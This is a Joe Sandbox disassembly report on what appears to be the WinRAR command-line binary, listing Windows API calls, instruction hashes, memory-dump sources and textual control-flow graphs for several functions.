                                                                                                                                                                                                                              • Opcode ID: 98f5ae8cc36bb269fb1f5a1ad2eab247a6cc4144c0524aa452d763e2f3d19770
                                                                                                                                                                                                                              • Instruction ID: e519b8c4e50e07c78a249be7e0e9642279befbf51c1a0cf129485aa3defa1812
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 98f5ae8cc36bb269fb1f5a1ad2eab247a6cc4144c0524aa452d763e2f3d19770
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5FE29D66A0CBE2C9FB20FB25D8401EDA7A1FB897A8F854135CA4D07796DFB9D544C320

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF74EEB4AE0: FreeLibrary.KERNEL32(?,?,00000000,00007FF74EE8CC90), ref: 00007FF74EEB4AF5
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,?,00007FF74EEA7E7D), ref: 00007FF74EEB492E
                                                                                                                                                                                                                              • GetVersionExW.KERNEL32(?,?,?,00007FF74EEA7E7D), ref: 00007FF74EEB496A
                                                                                                                                                                                                                              • LoadLibraryExW.KERNELBASE(?,?,?,00007FF74EEA7E7D), ref: 00007FF74EEB4993
                                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(?,?,?,00007FF74EEA7E7D), ref: 00007FF74EEB499F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$Load$FileFreeModuleNameVersion
                                                                                                                                                                                                                              • String ID: rarlng.dll
                                                                                                                                                                                                                              • API String ID: 2520153904-1675521814
                                                                                                                                                                                                                              • Opcode ID: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
                                                                                                                                                                                                                              • Instruction ID: 2d0621bc9d51cd659ff6f25a050bcccc032c75153dc30a64be5273d754ae0abb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 21314F3161CA62C9FB64FB25E8402F9B3A4FB457A4FC04135EA8D46A94EF7CD545C720

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF74EE94620,?,00000000,?,00007FF74EEB7A8C), ref: 00007FF74EE94736
                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,00000000,?,?,00007FF74EE94620,?,00000000,?,00007FF74EEB7A8C), ref: 00007FF74EE9476B
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,?,?,00007FF74EE94620,?,00000000,?,00007FF74EEB7A8C), ref: 00007FF74EE9477A
                                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(?,?,00000000,?,?,00007FF74EE94620,?,00000000,?,00007FF74EEB7A8C), ref: 00007FF74EE947A4
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,?,?,00007FF74EE94620,?,00000000,?,00007FF74EEB7A8C), ref: 00007FF74EE947B2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFind$ErrorFirstLast$Next
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 869497890-0
                                                                                                                                                                                                                              • Opcode ID: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                                                                                                                                                                                              • Instruction ID: d4d2c3dbe283a1a6c7136d4c9580eba93854c21015fb8a5ea243f5ec260100ee
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2441953260C695D6FA24FB25E5802E8A3A0FB497B4F804331EABD477C5DFACD5558710
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1815803762-0
                                                                                                                                                                                                                              • Opcode ID: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                                                                                                                                                                                              • Instruction ID: 06872ad9e8687b486d4028302dea00e0e7f16ae7d250f3144b5c0f53c7747125
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00014B26B0C6A082F700AB16A844339A762FBC4FE0F588431DF4D53B68CEBED9468700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Char
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 751630497-0
                                                                                                                                                                                                                              • Opcode ID: baabab1820374ba2820f1ea48004dae6935bb02fa1d5f0f7c129e9593b88d397
                                                                                                                                                                                                                              • Instruction ID: ec9b0ae0f3dca80dc66cf0ac2626e41bdf869c6f038743e8404fe19cb28ffde8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: baabab1820374ba2820f1ea48004dae6935bb02fa1d5f0f7c129e9593b88d397
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E22AF22A0C6A2D6F714FF30D4401FEBBA1FB50768F884135DA8D56299DFB8E942C760
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 20844e19174b7c935af85f2ccf491c603f06846682666545c1139ebf205162ad
                                                                                                                                                                                                                              • Instruction ID: 689117533171be7d6bcecf9d92a7bad5cd9878a760bb35d2aa9b3bb8bd7fc05d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 20844e19174b7c935af85f2ccf491c603f06846682666545c1139ebf205162ad
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4571E632A0979586E704FF36E4052ED73D1FB88BA4F044135DB5D8B399DFB8A08287A0

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 635 7ff74eeb3ea8-7ff74eeb3f03 call 7ff74eeca5a0 call 7ff74eecc8a0 640 7ff74eeb3f40-7ff74eeb3f50 call 7ff74eeba9e8 635->640 641 7ff74eeb3f05-7ff74eeb3f3e GetModuleFileNameW call 7ff74eea4e14 call 7ff74eeba9c0 635->641 645 7ff74eeb3f55-7ff74eeb3f79 call 7ff74ee91874 call 7ff74ee91e80 640->645 641->645 652 7ff74eeb4692-7ff74eeb46c5 call 7ff74ee918ac call 7ff74eeca610 645->652 653 7ff74eeb3f7f-7ff74eeb3f89 645->653 655 7ff74eeb3fae-7ff74eeb3feb call 7ff74eecec70 * 2 653->655 656 7ff74eeb3f8b-7ff74eeb3fac call 7ff74eeb11c0 * 2 653->656 668 7ff74eeb3fef-7ff74eeb3ff3 655->668 656->655 669 7ff74eeb40f2-7ff74eeb4112 call 7ff74ee922e0 call 7ff74eeceb90 668->669 670 7ff74eeb3ff9-7ff74eeb402d call 7ff74ee92440 call 7ff74ee92150 668->670 669->652 681 7ff74eeb4118-7ff74eeb4131 call 7ff74ee92150 669->681 679 7ff74eeb4033 670->679 680 7ff74eeb40bc-7ff74eeb40e2 call 7ff74ee922e0 670->680 683 7ff74eeb403a-7ff74eeb403e 679->683 680->668 692 7ff74eeb40e8-7ff74eeb40ec 680->692 689 7ff74eeb4133-7ff74eeb4136 681->689 690 7ff74eeb4138-7ff74eeb414b call 7ff74eeceb90 681->690 686 7ff74eeb4040-7ff74eeb4044 683->686 687 7ff74eeb4064-7ff74eeb4069 683->687 686->687 691 7ff74eeb4046-7ff74eeb405e call 7ff74eed2290 686->691 693 7ff74eeb4097-7ff74eeb409f 687->693 694 7ff74eeb406b-7ff74eeb4070 687->694 697 7ff74eeb416f-7ff74eeb41b1 call 7ff74eeba900 call 7ff74eeceb90 689->697 690->652 706 7ff74eeb4151-7ff74eeb416c call 7ff74eebd54c call 7ff74eeceb88 690->706 707 7ff74eeb4060 691->707 708 7ff74eeb40a3-7ff74eeb40a7 691->708 692->652 692->669 695 7ff74eeb40a1 693->695 696 7ff74eeb40b7 693->696 694->693 700 7ff74eeb4072-7ff74eeb4078 694->700 695->683 696->680 717 7ff74eeb41c0-7ff74eeb41d5 697->717 718 7ff74eeb41b3-7ff74eeb41bb call 7ff74eeceb88 697->718 704 7ff74eeb4093 700->704 705 7ff74eeb407a-7ff74eeb4091 call 7ff74eed1700 700->705 704->693 705->704 714 7ff74eeb40a9-7ff74eeb40b5 705->714 706->697 707->687 708->696 714->680 721 7ff74eeb45f0-7ff74eeb4624 call 7ff74eeb3884 call 7ff74eeceb88 * 2 717->721 722 7ff74eeb41db 717->722 718->652 756 7ff74eeb4626-7ff74eeb4648 call 7ff74eeb11c0 * 2 721->756 757 7ff74eeb464a-7ff74eeb4691 call 7ff74eecec70 * 2 721->757 725 7ff74eeb41e1-7ff74eeb41ee 722->725 728 7ff74eeb41f4-7ff74eeb41fa 725->728 729 7ff74eeb4508-7ff74eeb4513 725->729 732 7ff74eeb4208-7ff74eeb420e 728->732 733 7ff74eeb41fc-7ff74eeb4202 728->733 729->721 731 7ff74eeb4519-7ff74eeb4523 729->731 735 7ff74eeb4585-7ff74eeb4589 731->735 736 7ff74eeb4525-7ff74eeb452b 731->736 737 7ff74eeb43d0-7ff74eeb43e0 call 7ff74eeba580 732->737 738 7ff74eeb4214-7ff74eeb425c 732->738 733->729 733->732 739 7ff74eeb45a3-7ff74eeb45d4 call 7ff74eeb3884 735->739 740 7ff74eeb458b-7ff74eeb458f 735->740 742 7ff74eeb4531-7ff74eeb4539 736->742 743 7ff74eeb45db-7ff74eeb45de 736->743 762 7ff74eeb44f0-7ff74eeb4503 737->762 763 7ff74eeb43e6-7ff74eeb4414 call 7ff74eeba9e8 call 7ff74eed172c 737->763 744 7ff74eeb4261-7ff74eeb4264 738->744 739->743 740->739 746 7ff74eeb4591-7ff74eeb4597 740->746 749 7ff74eeb4573-7ff74eeb457a 742->749 750 7ff74eeb453b-7ff74eeb453e 742->750 743->721 751 7ff74eeb45e0-7ff74eeb45e5 743->751 752 7ff74eeb4268-7ff74eeb4270 744->752 746->743 755 7ff74eeb4599-7ff74eeb45a1 746->755 754 7ff74eeb457e-7ff74eeb4583 749->754 759 7ff74eeb4540-7ff74eeb4543 750->759 760 7ff74eeb456a-7ff74eeb4571 750->760 751->725 752->752 761 7ff74eeb4272-7ff74eeb4288 call 7ff74eed1700 752->761 754->743 755->743 756->757 757->652 765 7ff74eeb4561-7ff74eeb4568 759->765 766 7ff74eeb4545-7ff74eeb4548 759->766 760->754 780 7ff74eeb42a3 761->780 781 7ff74eeb428a-7ff74eeb4295 761->781 762->729 763->762 787 7ff74eeb441a-7ff74eeb44a9 call 7ff74eebd840 call 7ff74eeba900 call 7ff74eeba8c4 call 7ff74eeba900 call 7ff74eed15fc 763->787 765->754 771 7ff74eeb454a-7ff74eeb454d 766->771 772 7ff74eeb4558-7ff74eeb455f 766->772 771->746 778 7ff74eeb454f-7ff74eeb4556 771->778 772->754 778->754 784 7ff74eeb42a7-7ff74eeb42be 780->784 781->780 782 7ff74eeb4297-7ff74eeb42a1 781->782 782->784 784->744 788 7ff74eeb42c0-7ff74eeb42c2 784->788 823 7ff74eeb44bf-7ff74eeb44cf 787->823 824 7ff74eeb44ab-7ff74eeb44bb 787->824 790 7ff74eeb42e6 788->790 791 7ff74eeb42c4-7ff74eeb42d6 call 7ff74eeba900 788->791 790->737 794 7ff74eeb42ec 790->794 796 7ff74eeb42db-7ff74eeb42e1 791->796 797 7ff74eeb42f1-7ff74eeb42f7 794->797 799 7ff74eeb45d6 796->799 800 7ff74eeb4300-7ff74eeb4303 797->800 801 7ff74eeb42f9-7ff74eeb42fe 797->801 799->743 800->797 801->800 803 7ff74eeb4305-7ff74eeb4314 801->803 805 7ff74eeb4316-7ff74eeb4320 803->805 806 7ff74eeb433d-7ff74eeb4347 803->806 810 7ff74eeb4323-7ff74eeb4327 805->810 807 7ff74eeb45ea-7ff74eeb45ef call 7ff74eeca774 806->807 808 7ff74eeb434d-7ff74eeb4378 call 7ff74eebd840 806->808 807->721 818 7ff74eeb437a-7ff74eeb4399 call 7ff74eed1764 808->818 819 7ff74eeb439e-7ff74eeb43cb call 7ff74eeb470c 808->819 810->806 814 7ff74eeb4329-7ff74eeb433b 810->814 814->806 814->810 818->796 819->796 827 7ff74eeb44d2-7ff74eeb44d8 823->827 824->823 828 7ff74eeb44da-7ff74eeb44e5 827->828 829 7ff74eeb44eb-7ff74eeb44ee 827->829 828->799 828->829 829->827
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileModuleNamesnprintfwcschr
                                                                                                                                                                                                                              • String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS$\
                                                                                                                                                                                                                              • API String ID: 602362809-1645646101
                                                                                                                                                                                                                              • Opcode ID: bace2d2c65f060087d1e392495a2526bf2bc97d135f43877d2507ce5e202d588
                                                                                                                                                                                                                              • Instruction ID: e0f50e56f05564dd7f114e5e312e3716e36cd1ed1db40f989394e75bc7047a52
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bace2d2c65f060087d1e392495a2526bf2bc97d135f43877d2507ce5e202d588
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E622A322A1DAA2D9FB20FB15D4406B9A361FF447A4FC04235DA8E476D9EFBCE944C350

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1405 7ff74ee84fd0-7ff74ee8502d call 7ff74eeca5a0 1408 7ff74ee8504d-7ff74ee85055 1405->1408 1409 7ff74ee8502f-7ff74ee85037 1405->1409 1410 7ff74ee8506e-7ff74ee85089 call 7ff74eea420c 1408->1410 1411 7ff74ee85057-7ff74ee85069 call 7ff74ee8481c 1408->1411 1409->1408 1412 7ff74ee85039-7ff74ee8504b call 7ff74eecc8a0 1409->1412 1418 7ff74ee8508b-7ff74ee8509d call 7ff74eeba9c0 1410->1418 1419 7ff74ee8509f-7ff74ee850b6 call 7ff74eebdb08 1410->1419 1411->1410 1412->1408 1412->1411 1424 7ff74ee8511b-7ff74ee85131 call 7ff74eecc8a0 1418->1424 1419->1424 1425 7ff74ee850b8-7ff74ee850c3 call 7ff74eeba59c 1419->1425 1430 7ff74ee85137-7ff74ee8513e 1424->1430 1431 7ff74ee85203-7ff74ee8520d call 7ff74eebaa48 1424->1431 1425->1424 1432 7ff74ee850c5-7ff74ee850cf call 7ff74ee93054 1425->1432 1433 7ff74ee8516c-7ff74ee851be call 7ff74eebaa1c call 7ff74eebaa48 call 7ff74eeb6e98 1430->1433 1434 7ff74ee85140-7ff74ee85167 call 7ff74eea3f98 1430->1434 1440 7ff74ee85212-7ff74ee8521c 1431->1440 1432->1424 1441 7ff74ee850d1-7ff74ee85107 call 7ff74eeba9e8 call 7ff74eeba9c0 call 7ff74ee93054 1432->1441 1494 7ff74ee851d3-7ff74ee851e8 call 7ff74eeb7a24 1433->1494 1434->1433 1443 7ff74ee852db-7ff74ee852e0 1440->1443 1444 7ff74ee85222 1440->1444 1441->1424 1520 7ff74ee85109-7ff74ee85116 call 7ff74eeba9e8 1441->1520 1445 7ff74ee852e6-7ff74ee852e9 1443->1445 1446 7ff74ee85453-7ff74ee85477 call 7ff74ee8f00c call 7ff74ee8f230 call 7ff74ee8f09c 1443->1446 1449 7ff74ee85228-7ff74ee8522d 1444->1449 1450 7ff74ee8532f-7ff74ee85332 1444->1450 1454 7ff74ee85379-7ff74ee85382 1445->1454 1455 7ff74ee852ef-7ff74ee852f2 1445->1455 1498 7ff74ee8547c-7ff74ee85483 1446->1498 1449->1450 1458 7ff74ee85233-7ff74ee85236 1449->1458 1452 7ff74ee8533b-7ff74ee8533e 1450->1452 1453 7ff74ee85334 1450->1453 1462 7ff74ee85347-7ff74ee85358 call 7ff74ee71230 call 7ff74ee74858 1452->1462 1463 7ff74ee85340 1452->1463 1453->1452 1460 7ff74ee85449-7ff74ee85451 call 7ff74eeaeab8 1454->1460 1461 7ff74ee85388-7ff74ee8538b 1454->1461 1464 7ff74ee8536c-7ff74ee85374 call 7ff74eeb81cc 1455->1464 1465 7ff74ee852f4-7ff74ee852f7 1455->1465 1468 7ff74ee85238-7ff74ee8523b 1458->1468 1469 7ff74ee85290-7ff74ee85299 1458->1469 1460->1498 1471 7ff74ee8541b-7ff74ee85433 call 7ff74eebab1c 1461->1471 1472 7ff74ee85391-7ff74ee85397 1461->1472 1528 7ff74ee8535d 1462->1528 1463->1462 1464->1498 1465->1446 1474 7ff74ee852fd-7ff74ee85300 1465->1474 1479 7ff74ee8523d-7ff74ee85240 1468->1479 1480 7ff74ee85274-7ff74ee8528b call 7ff74ee71230 call 7ff74ee748ec 1468->1480 1476 7ff74ee8529b-7ff74ee8529e 1469->1476 1477 7ff74ee852b2-7ff74ee852bd 1469->1477 1471->1498 1527 7ff74ee85435-7ff74ee85447 call 7ff74eeabbd4 1471->1527 1484 7ff74ee8540c-7ff74ee85419 call 7ff74eea54f8 call 7ff74eea51e4 1472->1484 1485 7ff74ee85399-7ff74ee8539c 1472->1485 1474->1450 1486 7ff74ee85302-7ff74ee85305 1474->1486 1492 7ff74ee852ce-7ff74ee852d6 call 7ff74eea55e0 1476->1492 1493 7ff74ee852a0-7ff74ee852a6 1476->1493 1477->1492 1495 7ff74ee852bf-7ff74ee852c9 call 7ff74eeba9e8 1477->1495 1479->1446 1488 7ff74ee85246-7ff74ee85249 1479->1488 1543 7ff74ee8535e-7ff74ee85362 call 7ff74ee714fc 1480->1543 1484->1498 1501 7ff74ee8539e-7ff74ee853a1 1485->1501 1502 7ff74ee853ef-7ff74ee85401 call 7ff74ee845c8 1485->1502 1503 7ff74ee85307-7ff74ee8530a 1486->1503 1504 7ff74ee85322-7ff74ee8532a call 7ff74ee967e0 1486->1504 1488->1450 1506 7ff74ee8524f-7ff74ee85252 1488->1506 1492->1498 1511 7ff74ee852a8-7ff74ee852ad call 7ff74ee87214 1493->1511 1512 7ff74ee85313-7ff74ee8531d call 7ff74ee8481c 1493->1512 1545 7ff74ee851ea-7ff74ee85201 call 7ff74eeb6f68 call 7ff74ee714c0 1494->1545 1546 7ff74ee851c0-7ff74ee851ce call 7ff74eebaa48 1494->1546 1495->1492 1517 7ff74ee85485-7ff74ee8548c call 7ff74ee88444 1498->1517 1518 7ff74ee85491-7ff74ee854bc call 7ff74eeca610 1498->1518 1501->1512 1516 7ff74ee853a7-7ff74ee853d5 call 7ff74ee845c8 call 7ff74eebab1c 1501->1516 1502->1484 1503->1446 1519 7ff74ee85310 1503->1519 1504->1498 1506->1446 1523 7ff74ee85258-7ff74ee8525b 